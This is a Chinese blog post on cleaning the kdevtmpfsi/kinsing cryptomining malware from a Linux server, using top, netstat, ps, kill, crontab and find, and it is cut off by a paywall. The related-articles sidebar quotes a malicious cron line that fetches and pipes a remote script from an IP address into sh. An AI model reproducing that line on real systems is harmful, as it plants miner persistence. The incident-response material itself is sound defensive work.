【实战】记录一次服务器挖矿病毒处理

最新推荐文章于 2024-07-22 17:33:57 发布
最新推荐文章于 2024-07-22 17:33:57 发布
阅读量1.5k 收藏 4
点赞数 1
分类专栏: web安全 文章标签: 安全 ubuntu 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45694388/article/details/119085774
版权

信息收集及kill:

查看监控显示长期CPU利用率超高,怀疑中了病毒

在这里插入图片描述

top 命令查看进程资源占用:
在这里插入图片描述
netstat -lntupa 命令查看有无ip进行发包
在这里插入图片描述
netstat -antp
在这里插入图片描述
然而并没有找到对应的进程名

查看java进程和solr进程

在这里插入图片描述

ps aux :查看所有进程
在这里插入图片描述
除相关进程:kill -9(无条件退出进程)

为了防止有定时任务,再次启动恶意进程
crontab -l 命令查看正在进行中的定时任务
crontab -r 删除所有定时任务

在这里插入图片描述居然没有????

保存样本,删除木马进程文件:

find / -name kdevtmpfsi :查找进程文件(需要root权限)

在这里插入图片描述想要分析这个病毒样本,于是使用sz命令,将进程文件下载
在这里插入图片描述

ps -aux | grep kdevtmpfsi
ps -aux | grep kinsing

命令列出恶意进程及其端口号

正常来说用kill -9直接删除“kdevtmpfsi”和“kinsing”就可以结束这个事件了

之后cd入文件 em -rf [文件名] 将进程文件全部删除:

最低0.47元/天 解锁文章
b1gpig安全
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【应急响应】Windows应急响应手册(准备阶段、挖矿病毒
做自己喜欢的事,并将其发挥到极致!
07-16 825
本篇文章主要以WIndows系统为例围绕红蓝对抗和攻防角度实施应急响应的技术手段,以多方面、多维度进行展开,对于常见的应急事件所采取的应对措施进行阐述,希望对从事网安工作的小伙伴们有所帮助!
渗透系列:实战分享 | 记一次挖矿病毒的溯源----6379---redis
weixin_54626591的博客
01-10 508
实战分享 | 记一次挖矿病毒的溯源----6379---redis
针对挖矿病毒的简易三板斧
MSB_WLAQ的博客
09-30 1317
一. 简介 本文只基础说明遇到挖矿病毒的简单快速的处理思路,现实生产中遇到的病毒复杂的多。当企业面对病毒攻击的时候,一定要尽快交予专业安全人士处理,减少损失。 二. 实现过程(研究内容) 以linux系统为例,对中毒主机进行断网隔离后,查找挖矿病毒的基本操作: 1寻找进程,使用命令:Top 2删除进程,使用命令:kill -i PID 3删除文件,使用命令:rm -rf 后续处理:溯源分析,修补漏洞,安全加固 三. 检测方式(防御建议) 挖矿病毒特征:最大的特征就是主机的cpu资源占用,可
一次简单的挖矿病毒清除---实战
weixin_45300266的博客
01-09 2226
1、top 命令查看进程,cpu使用达到100% 此处尝试使用 kill -9+ 进程号 ,强制杀死进程后,病毒进程又重启,怀疑设置了定时任务 2、查看木马保存路径 通过ls -l proc/进程号/exe命令查看定位木马程序所在的目录,上图PID 为进程号 3、进入到木马文件所在路径 通过进程号定位到病毒文件后,进入到对应的目录 cd /usr/lib/updated ls 或者 ls -alh 4、使用删除命令 rm -rf + 病...
挖矿病毒应急处置
最新发布
2301_77977773的博客
07-22 1663
windows server2016虚拟机(切记千万不要再物理机上运行挖矿病毒2024 年 7 月 22 日, 接到XX 局用户电话反馈局域网内有一些终端设备在运行一段时间后出现莫名卡顿,怀疑内网感染了挖矿病毒。客户要求查出来原因,确认出影响范围,删除相关病毒文件并找出如如何感染的,梳理出时间链。从而避免下次出现相同的问题。
实战某高校的一次挖矿病毒的应急处置
qq_44433172的博客
09-19 1578
一次加班引发的应急处置的故事
Linux系统占用cpu病毒处理记录
一本正经学技术
09-24 1105
一、现象 近期服务器上面不知从哪里感染了病毒,导致CPU占用率特别高,中间临时处理过,由于不是专业处理,只能手动查看进程并结束进程ID号。 但手动的办法只能临时解决,病毒会再次启动,占用服务器cpu资源,查看定时任务,也没有相关任务记录。 crontab -l #无相关定时任务列表显示,如下图 二、经验 昨天刚处理过一台云服务器的kthreaddk病毒程序,处理方法简单记录如下: 1、查看异常进程,并kill掉,例如异常进程pid为26525 [root@hostname /]# kill -9 26
挖矿病毒
weixin_34367257的博客
10-28 2111
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root echo "...
安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒
weixin_54707168的博客
02-22 654
安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
热门推荐
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
Linux中处置挖矿病毒样本演示
qq_39330735的博客
03-29 1446
Linux处理挖矿病毒
挖矿病毒分析
LiBai'S BLOG
03-10 1万+
病毒样本 分析样本 要求 确定二进制文件类型 给出钱包地址的 IOC 特征 文件类型:PE64 脱壳 upx.exe -d svhostd.jpg.virus 钱包地址的 IOC 特征 云沙箱自动分析
Linux应急响应-挖矿(kdevtmpfsi)——事件复现(含样本)
W小哥
03-16 4760
此次复现挖矿清除不溯源,只是简单的记一下 一、事件背景 某天打开我的服务器,发现CPU飙到100%。肯定有问题,应该又被挖矿服务器:Linux系统 二、事件处理 2.1 top 查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi 根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了 kill -9 但是过了一会儿又自动启动了 查看定时任务:crontab -l 删除定时任务:crontab -r 删除相关文件: find /
“LemonDuck”挖矿病毒,窃取SSH 凭据横向传播
weixin_52834323的博客
02-15 303
LemonDuck”无文件挖矿病毒自上次重新启用 Python 打包的EXE 模块之后再次更新,此次更新增加了针对Linux 平台的Hadoop Yarn 未授权访问漏洞利用、Windows 平台的WMI 持久化事件创建以及Shell 版本的SSH 爆破模块,可以从被攻破的Linux 机器中收集曾连接过的其他Linux 主机IP/Port 和帐密信息进行传播。我们可以看到,在上一版本“LemonDuck”的 PowerShell 脚本中已经禁用的MS17-010 漏洞利用和。
挖矿蠕虫样本分析
weixin_30319153的博客
11-16 479
转载于:https://www.cnblogs.com/0x4D75/p/9970491.html
第164天:应急响应-挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复
qq_46081990的博客
07-06 625
挖矿病毒的背景一般是CPU、GPU占用很高,服务器耗电量很大我们上来首先做的是看CPU、GPU占用率,定位占用率很高的进程找到挖矿病毒样本,将病毒样本放到微步在线上分析由于挖矿病毒通常会做权限维持,单纯删除病毒文件无法根治,还是会重新生成所以要继续排查计划任务、启动项、映像劫持等,删除干净后,杀死进程并删除病毒文件即可由于黑客能上传挖矿病毒,那必定是拿到了服务器权限的,所以重点还需要知道黑客是如何进来的(比如黑客通过ssh弱口令爆破拿到的服务器,那么我们如何知道呢?
qW3xT.5 记一次解决挖矿病毒
qq_33129875的博客
01-30 1134
两个月前被4.0版本搞过,没想到又被搞了一次,版本变成5.0了。 原因的话可能是redis没有设置IP限制,当时我自己搞了个玩,我设的是0.0.0.0.  em~~,就是这个东西。 解决办法的话:简单直接点 1,删定时任务:crontab -l,如下图,就是这个东西,然后crontab -r删掉 2, 删相关文件: (1)改目录下有个root文件,删掉。 (2)然后把/t...
近期DDG挖矿病毒防护与分析
weixin_34018169的博客
08-13 432
0x01 导语 最近观察到,7月底8月初以来,又较大范围出现多例感染DDG挖矿病毒的情况(DDG从去年开始出现和活跃),该病毒通过Redis服务传播,并且运行在Linux操作系统环境下 该威胁可以被阿里云态势感知发现并产生警报: 本文给出在感染该挖矿病毒情况下的恢复方案、防护措施以及对该挖矿病毒进行一定程度的分析 0x02 恢复与防护 如果服务器出现CP...
QuickServer Java实战:打造高效TCP服务器
"QuickServer开发指南,是一份针对Java开发者的实战教程,主要讲解如何使用QuickServer这个免费开源的Java库来构建健壮的多线程、多客户端TCP服务器应用程序。教程适合已有基本Java编程和网络知识的读者,旨在简化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值